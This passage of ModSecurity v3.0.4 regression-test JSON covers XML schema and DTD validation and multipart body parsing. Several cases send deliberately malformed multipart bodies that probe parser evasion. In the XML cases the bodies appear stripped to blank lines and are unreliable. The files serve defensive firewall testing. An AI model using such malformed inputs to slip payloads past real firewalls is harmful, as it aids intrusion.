REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", "SecRule XML \"@validateSchema test-cases/data/SoapEnvelope.xsd\" \"id:500007,phase:3,deny\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing XML request body parser (validate attribute value failed)", "expected":{ "debug_log": "'badval' is not a valid value of the local atomic type", "http_code": 403 }, "client":{ "ip":"200.249.12.31", "port":123 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, "uri":"/?key=value&key=other_value", "method":"POST", "body": [ "", " ", " ", " ", " 12123", " ", " ", " " ] }, "server":{ "ip":"200.249.12.31", "port":80 }, "rules":[ "SecRuleEngine On", "SecRequestBodyAccess On", "SecXMLExternalEntity On", "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500008,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", "SecRule XML \"@validateSchema test-cases/data/SoapEnvelope.xsd\" \"id:500007,phase:3,deny\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing XML request body parser (validate failed)", "expected":{ "debug_log": "This element is not expected. Expected is one of", "http_code": 403 }, "client":{ "ip":"200.249.12.31", "port":123 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, "uri":"/?key=value&key=other_value", "method":"POST", "body": [ "", " ", " ", " ", " 12123", " ", " ", " " ] }, "server":{ "ip":"200.249.12.31", "port":80 }, "rules":[ "SecRuleEngine On", "SecRequestBodyAccess On", "SecXMLExternalEntity On", "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500008,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", "SecRule XML \"@validateSchema test-cases/data/SoapEnvelope.xsd\" \"id:500007,phase:3,deny\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing XML request body parser (bad XML)", "expected":{ "debug_log": "XML Error: Element '{http://schemas.xmlsoap.org/soap/envelope/}xBody'", "http_code": 403 }, "client":{ "ip":"200.249.12.31", "port":123 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, "uri":"/?key=value&key=other_value", "method":"POST", "body": [ "", " ", " ", " ", " 12123", " ", " ", " " ] }, "server":{ "ip":"200.249.12.31", "port":80 }, "rules":[ "SecRuleEngine On", "SecRequestBodyAccess On", "SecXMLExternalEntity On", "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500008,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", "SecRule XML \"@validateSchema test-cases/data/SoapEnvelope.xsd\" \"id:500007,phase:3,deny\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing XML request body parser (bad schema)", "expected":{ "debug_log": "XML: Failed to load Schema: test-cases/data/SoapEnvelope-bad.xsd. XML Error: Failed to parse the XML resource 'test-cases/data/SoapEnvelope-bad.xsd", "http_code": 403 }, "client":{ "ip":"200.249.12.31", "port":123 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, "uri":"/?key=value&key=other_value", "method":"POST", "body": [ "", " ", " ", " ", " 12123", " ", " ", "" ] }, "server":{ "ip":"200.249.12.31", "port":80 }, "rules":[ "SecRuleEngine On", "SecRequestBodyAccess On", "SecXMLExternalEntity On", "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500008,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", "SecRule XML \"@validateSchema test-cases/data/SoapEnvelope-bad.xsd\" \"id:500007,phase:3,deny\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/request-body-parser-xml-validade-dtd.json0000644000175000017500000001316413607066010031651 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing XML request body parser - validateDTD (validate ok)", "expected":{ "debug_log": "XML: Successfully validated payload against DTD: test-cases/data/SoapEnvelope.dtd" }, "client":{ "ip":"200.249.12.31", "port":123 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, "uri":"/?key=value&key=other_value", "method":"POST", "body": [ "", " ", " ", " ", " ", " 12123", " ", " ", " " ] }, "server":{ "ip":"200.249.12.31", "port":80 }, "rules":[ "SecRuleEngine On", "SecRequestBodyAccess On", "SecXMLExternalEntity On", "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500008,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", "SecRule XML \"@validateDTD test-cases/data/SoapEnvelope.dtd\" \"id:500007,phase:3,deny\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing XML request body parser - validateDTD (validation failed)", "expected":{ "debug_log": "XML Error: No declaration for element xBody", "http_code": 403 }, "client":{ "ip":"200.249.12.31", "port":123 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, "uri":"/?key=value&key=other_value", "method":"POST", "body": [ "", " ", " ", " ", " ", " 12123", " ", " ", " " ] }, "server":{ "ip":"200.249.12.31", "port":80 }, "rules":[ "SecRuleEngine On", "SecRequestBodyAccess On", "SecXMLExternalEntity On", "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500008,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", "SecRule XML \"@validateDTD test-cases/data/SoapEnvelope.dtd\" \"id:500007,phase:3,deny\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing XML request body parser - validateDTD (bad XML)", "expected":{ "debug_log": "XML: DTD validation failed because content is not well formed", "http_code": 403 }, "client":{ "ip":"200.249.12.31", "port":123 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, "uri":"/?key=value&key=other_value", "method":"POST", "body": [ "", "", " ", " ", " ", " 12123", " ", " ", " " ] }, "server":{ "ip":"200.249.12.31", "port":80 }, "rules":[ "SecRuleEngine On", "SecRequestBodyAccess On", "SecXMLExternalEntity On", "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500008,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", "SecRule XML \"@validateDTD test-cases/data/SoapEnvelope.dtd\" \"id:500007,phase:3,deny\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing XML request body parser - validateDTD (bad DTD)", "expected":{ "debug_log": "Failed to load DTD: test-cases/data/SoapEnvelope-bad.dtd", "http_code": 403 }, "client":{ "ip":"200.249.12.31", "port":123 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, "uri":"/?key=value&key=other_value", "method":"POST", "body": [ "", " ", " ", " ", " ", " 12123", " ", " ", " " ] }, "server":{ "ip":"200.249.12.31", "port":80 }, "rules":[ "SecRuleEngine On", "SecRequestBodyAccess On", "SecXMLExternalEntity On", "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500008,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", "SecRule XML \"@validateDTD test-cases/data/SoapEnvelope-bad.dtd\" \"id:500007,phase:3,deny\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/request-body-parser-multipart.json0000644000175000017500000030443013607066010030551 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"multipart parser (normal)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=0000", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--0000\r", "Content-Disposition: form-data; name=\"name\"\r", "\r", "Brian Rectanus\r", "--0000\r", "Content-Disposition: form-data; name=\"email\"\r", "\r", "brian.rectanus@breach.com\r", "--0000\r", "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", "Content-Type: image/jpeg\r", "\r", "BINARYDATA\r", "--0000--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Added file part to the list: name \"image\" file name \"image.jpg\" \\(offset 258, length 10\\)" }, "rules":[ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500055\"", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500056\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500057\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (final CRLF)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "-----------------------------69343412719991675451336310646\r", "Content-Disposition: form-data; name=\"a\"\r", "\r", "1\r", "-----------------------------69343412719991675451336310646\r", "Content-Disposition: form-data; name=\"b\"\r", "\r", "2\r", "-----------------------------69343412719991675451336310646--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Adding request argument \\(BODY\\): name \"a\", value \"1\"" }, "rules":[ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500055\"", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500056\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500057\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (no final CRLF) - FIXME: test suit cannot work without the ending \\n", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "-----------------------------69343412719991675451336310646\r", "Content-Disposition: form-data; name=\"a\"\r", "\r", "1\r", "-----------------------------69343412719991675451336310646\r", "Content-Disposition: form-data; name=\"b\"\r", "\r", "2\r", "-----------------------------69343412719991675451336310646--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Adding request argument \\(BODY\\): name \"a\", value \"1\"" }, "rules":[ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500055\"", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500056\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500057\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (boundary contains \"boundary\")", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=------------------------------------------------boundary", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--------------------------------------------------boundary\r", "Content-Disposition: form-data; name=\"a\"\r", "\r", "1\r", "--------------------------------------------------boundary\r", "Content-Disposition: form-data; name=\"b\"\r", "\r", "2\r", "--------------------------------------------------boundary--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Adding request argument \\(BODY\\): name \"a\", value \"1\"" }, "rules":[ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500055\"", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500056\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500057\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (boundary contains \"bOuNdArY\")", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=--------0xKhTmLbOuNdArY", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "----------0xKhTmLbOuNdArY\r", "Content-Disposition: form-data; name=\"a\"\r", "\r", "1\r", "----------0xKhTmLbOuNdArY\r", "Content-Disposition: form-data; name=\"b\"\r", "\r", "2\r", "----------0xKhTmLbOuNdArY--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Adding request argument \\(BODY\\): name \"a\", value \"1\"" }, "rules":[ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500055\"", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500056\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500057\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (data contains \"--\")", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "-----------------------------69343412719991675451336310646\r", "Content-Disposition: form-data; name=\"a\"\r", "\r", "--test\r", "-----------------------------69343412719991675451336310646\r", "Content-Disposition: form-data; name=\"b\"\r", "\r", "--\r", "-----------------------------69343412719991675451336310646--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Adding request argument \\(BODY\\): name \"a\", value \"--test\"" }, "rules":[ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500055\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500057\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser error (no final boundary)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "-----------------------------69343412719991675451336310646\r", "Content-Disposition: form-data; name=\"a\"\r", "\r", "1\r", "-----------------------------69343412719991675451336310646\r", "Content-Disposition: form-data; name=\"b\"\r", "\r", "2\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Final boundary missing" }, "rules":[ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule MULTIPART_NAME \"@eq 1234\" \"phase:2,deny,id:500067\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser error (no disposition)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "-----------------------------69343412719991675451336310646\r", "\r", "1\r", "-----------------------------69343412719991675451336310646\r", "\r", "2\r", "-----------------------------69343412719991675451336310646--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Part missing Content-Disposition header" }, "rules":[ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule MULTIPART_NAME \"@eq 1234\" \"phase:2,deny,id:500067\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser error (bad disposition)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "-----------------------------69343412719991675451336310646\r", "Content-Disposition: form-data name=\"a\"\r", "\r", "1\r", "-----------------------------69343412719991675451336310646\r", "Content-Disposition: form-data name=\"b\"\r", "\r", "2\r", "-----------------------------69343412719991675451336310646--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Invalid Content-Disposition header" }, "rules":[ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule MULTIPART_NAME \"@eq 1234\" \"phase:2,deny,id:500067\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser error (no disposition name)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "-----------------------------69343412719991675451336310646\r", "Content-Disposition: form-data;\r", "\r", "1\r", "-----------------------------69343412719991675451336310646\r", "Content-Disposition: form-data;\r", "\r", "2\r", "-----------------------------69343412719991675451336310646--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Content-Disposition header missing name field" }, "rules":[ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule MULTIPART_NAME \"@eq 1234\" \"phase:2,deny,id:500067\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser error (no disposition name)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "-----------------------------69343412719991675451336310646\r", "Content-Disposition: form-data; name=\"a\"\r", "\r", "1\r", "-----------------------------69343412719991675451336310646\r", ":\r", "-----------------------------69343412719991675451336310646\r", "Content-Disposition: form-data; name=\"b\"\r", "\r", "2\r", "-----------------------------69343412719991675451336310646--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"nvalid part header \\(header name missing\\)" }, "rules":[ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule MULTIPART_NAME \"@eq 1234\" \"phase:2,deny,id:500067\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (part header folding - space)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "-----------------------------69343412719991675451336310646\r", "Content-Disposition: form-data;\r", " name=\"a\"\r", "\r", "1\r", "-----------------------------69343412719991675451336310646\r", "Content-Disposition: form-data;\r", " name=\"b\"\r", "\r", "2\r", "-----------------------------69343412719991675451336310646--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"name: a.*variable: 1.*" }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,status:403,id:500074\"", "SecRule MULTIPART_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500075\"", "SecRule MULTIPART_INVALID_HEADER_FOLDING \"!@eq 0\" \"phase:2,deny,status:403,id:500076\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,status:403,id:500077\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (part header folding - tab)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "-----------------------------69343412719991675451336310646\r", "Content-Disposition: form-data;\r", " name=\"a\"\r", "\r", "1\r", "-----------------------------69343412719991675451336310646\r", "Content-Disposition: form-data;\r", " name=\"b\"\r", "\r", "2\r", "-----------------------------69343412719991675451336310646--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"name: a.*variable: 1.*" }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,status:403,id:500074\"", "SecRule MULTIPART_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500075\"", "SecRule MULTIPART_INVALID_HEADER_FOLDING \"!@eq 0\" \"phase:2,deny,status:403,id:500076\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,status:403,id:500077\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (part header folding - mixed)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "-----------------------------69343412719991675451336310646\r", "Content-Disposition: form-data; name=\"a\"\r", "\r", "1\r", "-----------------------------69343412719991675451336310646\r", "Content-Disposition: form-data;\r", " name=\"b\"\r", "\r", "2\r", "-----------------------------69343412719991675451336310646--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"name: a.*variable: 1.*" }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,status:403,id:500074\"", "SecRule MULTIPART_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500075\"", "SecRule MULTIPART_INVALID_HEADER_FOLDING \"!@eq 0\" \"phase:2,deny,status:403,id:500076\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,status:403,id:500077\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (part header folding - invalid)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "-----------------------------69343412719991675451336310646\r", "Content-Disposition: form-data; name=\"a\"\r", "\r", "1\r", "-----------------------------69343412719991675451336310646\r", "Content-Disposition: form-data;\r", "\fname=\"b\"\r", "\r", "2\r", "-----------------------------69343412719991675451336310646--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"name: a.*variable: 1.*" }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,status:403,id:500074\"", "SecRule MULTIPART_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500075\"", "SecRule MULTIPART_INVALID_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500076\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,status:403,id:500077\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (part header folding - mixed invalid)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "-----------------------------69343412719991675451336310646\r", "Content-Disposition: form-data; name=\"a\"\r", "\r", "1\r", "-----------------------------69343412719991675451336310646\r", "Content-Disposition: form-data;\r", "\f\tname=\"b\"\r", "\r", "2\r", "-----------------------------69343412719991675451336310646--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"name: a.*variable: 1.*" }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,status:403,id:500074\"", "SecRule MULTIPART_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500075\"", "SecRule MULTIPART_INVALID_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500076\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,status:403,id:500077\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (data after final boundary)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "-----------------------------69343412719991675451336310646\r", "Content-Disposition: form-data; name=\"a\"\r", "\r", "1\r", "-----------------------------69343412719991675451336310646--\r", "-----------------------------69343412719991675451336310646\r", "Content-Disposition: form-data; name=\"b\"\r", "\r", "2\r", "-----------------------------69343412719991675451336310646--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"name: a.*variable: 1.*", "http_code": 403 }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_DATA_AFTER \"@eq 1\" \"phase:2,deny,status:403,id:500074\"" ] }, { 